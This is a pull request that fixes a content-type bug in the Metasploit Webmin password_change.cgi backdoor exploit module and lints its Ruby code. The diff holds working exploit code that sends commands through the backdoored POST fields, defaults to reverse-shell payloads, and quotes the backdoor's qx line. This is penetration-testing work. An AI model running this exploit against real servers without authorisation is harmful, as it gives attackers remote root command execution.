### PR TITLE
fix content type header bug in webmin_backdoor.rb

### DIFF
--- a/modules/exploits/linux/http/webmin_backdoor.rb
+++ b/modules/exploits/linux/http/webmin_backdoor.rb
@@ -146,12 +146,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    # These CheckCodes are allowed to pass automatically
-    checkcodes = [
-      CheckCode::Appears,
-      CheckCode::Vulnerable
-    ]
-
     print_status("Configuring #{target.name} target")
 
     case target['Type']

--- a/modules/exploits/linux/http/webmin_backdoor.rb
+++ b/modules/exploits/linux/http/webmin_backdoor.rb
@@ -15,64 +15,73 @@ class MetasploitModule < Msf::Exploit::Remote
   moved_from 'exploit/unix/webapp/webmin_backdoor'
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'               => 'Webmin password_change.cgi Backdoor',
-      'Description'        => %q{
-        This module exploits a backdoor in Webmin versions 1.890 through 1.920.
-        Only the SourceForge downloads were backdoored, but they are listed as
-        official downloads on the project's site.
+    super(
+      update_info(
+        info,
+        'Name' => 'Webmin password_change.cgi Backdoor',
+        'Description' => %q{
+          This module exploits a backdoor in Webmin versions 1.890 through 1.920.
+          Only the SourceForge downloads were backdoored, but they are listed as
+          official downloads on the project's site.
 
-        Unknown attacker(s) inserted Perl qx statements into the build server's
-        source code on two separate occasions: once in April 2018, introducing
-        the backdoor in the 1.890 release, and in July 2018, reintroducing the
-        backdoor in releases 1.900 through 1.920.
+          Unknown attacker(s) inserted Perl qx statements into the build server's
+          source code on two separate occasions: once in April 2018, introducing
+          the backdoor in the 1.890 release, and in July 2018, reintroducing the
+          backdoor in releases 1.900 through 1.920.
 
-        Only version 1.890 is exploitable in the default install. Later affected
-        versions require the expired password changing feature to be enabled.
-      },
-      'Author'             => [
-        'AkkuS', # (Özkan Mustafa Akkuş) Discovery and independent module
-        'wvu'    # This module and updated information about the backdoor
-      ],
-      'References'         => [
-        ['CVE', '2019-15107'], # y tho
-        ['URL', 'http://www.webmin.com/exploit.html'],
-        ['URL', 'https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html'],
-        ['URL', 'https://blog.firosolutions.com/exploits/webmin/'],
-        ['URL', 'https://github.com/webmin/webmin/issues/947']
-      ],
-      'DisclosureDate'     => '2019-08-10',
-      'License'            => MSF_LICENSE,
-      'Platform'           => ['unix', 'linux'],
-      'Arch'               => [ARCH_CMD, ARCH_X86, ARCH_X64],
-      'Privileged'         => true,
-      'Targets'            => [
-        ['Automatic (Unix In-Memory)',
-          'Platform'       => 'unix',
-          'Arch'           => ARCH_CMD,
-          'Version'        => [
-            Rex::Version.new('1.890'), Rex::Version.new('1.920')
-          ],
-          'Type'           => :unix_memory,
-          'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}
+          Only version 1.890 is exploitable in the default install. Later affected
+          versions require the expired password changing feature to be enabled.
+        },
+        'Author' => [
+          'AkkuS', # (Özkan Mustafa Akkuş) Discovery and independent module
+          'wvu'    # This module and updated information about the backdoor
         ],
-        ['Automatic (Linux Dropper)',
-          'Platform'       => 'linux',
-          'Arch'           => [ARCH_X86, ARCH_X64],
-          'Version'        => [
-            Rex::Version.new('1.890'), Rex::Version.new('1.920')
+        'References' => [
+          ['CVE', '2019-15107'], # y tho
+          ['URL', 'http://www.webmin.com/exploit.html'],
+          ['URL', 'https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html'],
+          ['URL', 'https://blog.firosolutions.com/exploits/webmin/'],
+          ['URL', 'https://github.com/webmin/webmin/issues/947']
+        ],
+        'DisclosureDate' => '2019-08-10',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Automatic (Unix In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Version' => [
+                Rex::Version.new('1.890'), Rex::Version.new('1.920')
+              ],
+              'Type' => :unix_memory,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }
+            }
           ],
-          'Type'           => :linux_dropper,
-          'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'}
-        ]
-      ],
-      'DefaultTarget'      => 0,
-      'Notes'              => {
-        'Stability'        => [CRASH_SAFE],
-        'Reliability'      => [REPEATABLE_SESSION],
-        'SideEffects'      => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
-      }
-    ))
+          [
+            'Automatic (Linux Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Version' => [
+                Rex::Version.new('1.890'), Rex::Version.new('1.920')
+              ],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
 
     register_options([
       Opt::RPORT(10000),
@@ -83,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     res = send_request_cgi(
       'method' => 'GET',
-      'uri'    => normalize_uri(target_uri.path)
+      'uri' => normalize_uri(target_uri.path)
     )
 
     unless res
@@ -107,7 +116,6 @@ class MetasploitModule < Msf::Exploit::Remote
     version = Rex::Version.new(version)
 
     vprint_status("Webmin #{version} detected")
-    checkcode = CheckCode::Detected
 
     unless version.between?(*target['Version'])
       vprint_error("Webmin #{version} is not a supported target")
@@ -115,13 +123,12 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     vprint_good("Webmin #{version} is a supported target")
-    checkcode = CheckCode::Appears
 
     res = execute_command("echo #{token}")
 
     unless res
       vprint_error('Webmin did not respond to check command')
-      return checkcode
+      return CheckCode::Appears
     end
 
     if res.body.include?('Password changing is not enabled!')
@@ -131,13 +138,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if res.body.include?(token)
       vprint_good('Webmin executed a benign check command')
-      checkcode = CheckCode::Vulnerable
+      return CheckCode::Vulnerable
     else
       vprint_error('Webmin did not execute our check command')
       return CheckCode::Safe
     end
-
-    checkcode
   end
 
   def exploit
@@ -189,9 +194,9 @@ wvu@kharak:~/Downloads$ diff3 webmin-1.{890,930,920}/password_change.cgi
 ====3
 1:40c
 2:40c
-  	$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'});
+    $enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'});
 3:40c
-  	$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);
+    $enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);
 ====3
 1:200c
 2:200c
@@ -202,16 +207,17 @@ wvu@kharak:~/Downloads$
 =end
   def execute_command(cmd, _opts = {})
     send_request_cgi({
-      'method'    => 'POST',
-      'uri'       => normalize_uri(target_uri.path, 'password_change.cgi'),
-      'headers'   => {'Referer' => full_uri},
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
+      'headers' => { 'Referer' => full_uri },
+      'ctype' => 'text/plain',
       'vars_post' => {
         # 1.890
         'expired' => cmd,
         # 1.900-1.920
-        'new1'    => token,
-        'new2'    => token,
-        'old'     => cmd
+        'new1' => token,
+        'new2' => token,
+        'old' => cmd
       }
     }, 3.5)
   end


### PR DESCRIPTION
# About
This change fixes a bug in the `webmin_backdoor` that was causing the target to reset the connection. It also adds linting.

# Details
The `execute_command` method does not define the content type header, causing Metasploit to set it to the default value, namely `application/x-www-form-urlencoded`. However, this content type was causing my target (Webmin 1.890) to reset the connection upon receiving the POST request defined in  `execute_command` . I fixed this by adding the following line to set the content-type header to plaintext:
```
'ctype' => 'text/plain',
```

All the other changes are the result of me running rubocop and making a few changes to get it to stop complaining about useless variable assignments.

I will only have access to this target to a limited period of time so I will send an email to msfdev with a spool file showing the results when running the original module vs the fix in `check` mode. I was also able to get a shell after fixing the module.

# Remaining rubocop issue
Rubcop still complains about this code in the `exploit`  method as it considers it useless assignment of a variable:
```
    checkcodes = [
      CheckCode::Appears,
      CheckCode::Vulnerable
    ]
```
However I noticed the exact code is part of another module as well, so I wasn't sure if this is relic leftover from before autocheck was added, or if this actually still serves a purpose. Feel free to delete it if this is redundant.